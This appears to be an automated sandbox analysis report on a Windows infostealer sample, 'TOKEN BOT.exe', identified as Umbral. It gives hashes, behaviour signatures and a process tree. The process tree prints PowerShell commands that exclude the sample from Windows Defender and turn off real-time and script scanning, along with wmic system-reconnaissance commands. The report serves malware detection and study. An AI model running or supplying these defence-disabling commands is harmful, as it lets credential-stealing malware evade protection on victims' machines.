Overview

overview

10

Static

static

10

TOKEN BOT.exe

windows7-x64

10

TOKEN BOT.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    1565s
  • max time network
    1566s
  • platform
    windows7_x64
  • resource
    win7-20240220-en
  • resource tags

    arch:x64arch:x86image:win7-20240220-enlocale:en-usos:windows7-x64system
  • submitted
    07-06-2024 16:37

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    TOKEN BOT.exe

  • Size

    231KB

  • MD5

    6237b7bfdeef6aa9095852ac74ab5e6e

  • SHA1

    deaf71a3709b52817cdfe5aec902507c8b89b36b

  • SHA256

    b4aff6f798705f34a3edf6b528a71aa2dbbeb6d71299799eb1042a09822af2f6

  • SHA512

    263e769b21fc67f6ccb3c3135b66635cfb12af503b3d90bcc304a1d0b3f7a2524df630c2f3d2dbb968eb5296569e77a49aa66e0627eaea7d5df89c761454541d

  • SSDEEP

    6144:RloZMQrIkd8g+EtXHkv/iD4vBLU69VewbGkFZw1fUtLJU8e1mci:joZ3L+EP8vBLU69VewbGkFZwlkL42

Score
10/10
umbralexecutionspywarestealer

Malware Config

Signatures

  • Detect Umbral payload 1 IoCs
  • Umbral

    Umbral stealer is an opensource moduler stealer written in C#.

    stealerumbral
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

    execution
  • Drops file in Drivers directory 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 21 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\TOKEN BOT.exe
    "C:\Users\Admin\AppData\Local\Temp\TOKEN BOT.exe"
    1⤵
    • Drops file in Drivers directory
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2792
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\TOKEN BOT.exe'
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2644
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2692
    • C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" os get Caption
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:2876
    • C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" computersystem get totalphysicalmemory
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:2592
    • C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" csproduct get uuid
      2⤵
        PID:2756
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        PID:2184
      • C:\Windows\System32\Wbem\wmic.exe
        "wmic" path win32_VideoController get name
        2⤵
        • Detects videocard installed
        PID:1552
    • C:\Windows\explorer.exe
      "C:\Windows\explorer.exe"
      1⤵
        PID:1340

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\MY47SOA1A7Q2N3782NTN.temp
        Filesize

        7KB

        MD5

        07931a2700568a0e061ff78c59486a2e

        SHA1

        bc6379bc7e6810f4f2f4e820f87e218755f38beb

        SHA256

        896ad26d241423d5b0c6d5e9d66b7d51fb8743731c5657e4695cf170e5a2e445

        SHA512

        7d688838d48a91022e8e75be8d6c1ec7a49d8ee77f3ee08023fcec325540479a8ca2fe57e4f53d336c06a841682905053d1c0f8840be1faf1c0f0a0f7246ee9f

        Download Submit

      • \??\PIPE\srvsvc
        MD5

        d41d8cd98f00b204e9800998ecf8427e

        SHA1

        da39a3ee5e6b4b0d3255bfef95601890afd80709

        SHA256

        e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

        SHA512

        cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

        Download Submit

      • memory/2184-34-0x000000001B650000-0x000000001B932000-memory.dmp

        Filesize

        2.9MB

        Download

      • memory/2644-8-0x000000001B760000-0x000000001BA42000-memory.dmp

        Filesize

        2.9MB

        Download

      • memory/2644-9-0x0000000001DF0000-0x0000000001DF8000-memory.dmp

        Filesize

        32KB

        Download

      • memory/2644-12-0x000007FEEE250000-0x000007FEEEBED000-memory.dmp

        Filesize

        9.6MB

        Download

      • memory/2644-11-0x0000000002C8B000-0x0000000002CF2000-memory.dmp

        Filesize

        412KB

        Download

      • memory/2644-10-0x0000000002C84000-0x0000000002C87000-memory.dmp

        Filesize

        12KB

        Download

      • memory/2644-7-0x000007FEEE50E000-0x000007FEEE50F000-memory.dmp

        Filesize

        4KB

        Download

      • memory/2644-38-0x000007FEEE250000-0x000007FEEEBED000-memory.dmp

        Filesize

        9.6MB

        Download

      • memory/2692-18-0x000000001B8F0000-0x000000001BBD2000-memory.dmp

        Filesize

        2.9MB

        Download

      • memory/2692-19-0x0000000001D20000-0x0000000001D28000-memory.dmp

        Filesize

        32KB

        Download

      • memory/2792-0-0x000007FEF5783000-0x000007FEF5784000-memory.dmp

        Filesize

        4KB

        Download

      • memory/2792-2-0x000007FEF5780000-0x000007FEF616C000-memory.dmp

        Filesize

        9.9MB

        Download

      • memory/2792-1-0x0000000001010000-0x0000000001050000-memory.dmp

        Filesize

        256KB

        Download

      • memory/2792-37-0x000007FEF5780000-0x000007FEF616C000-memory.dmp

        Filesize

        9.9MB

        Download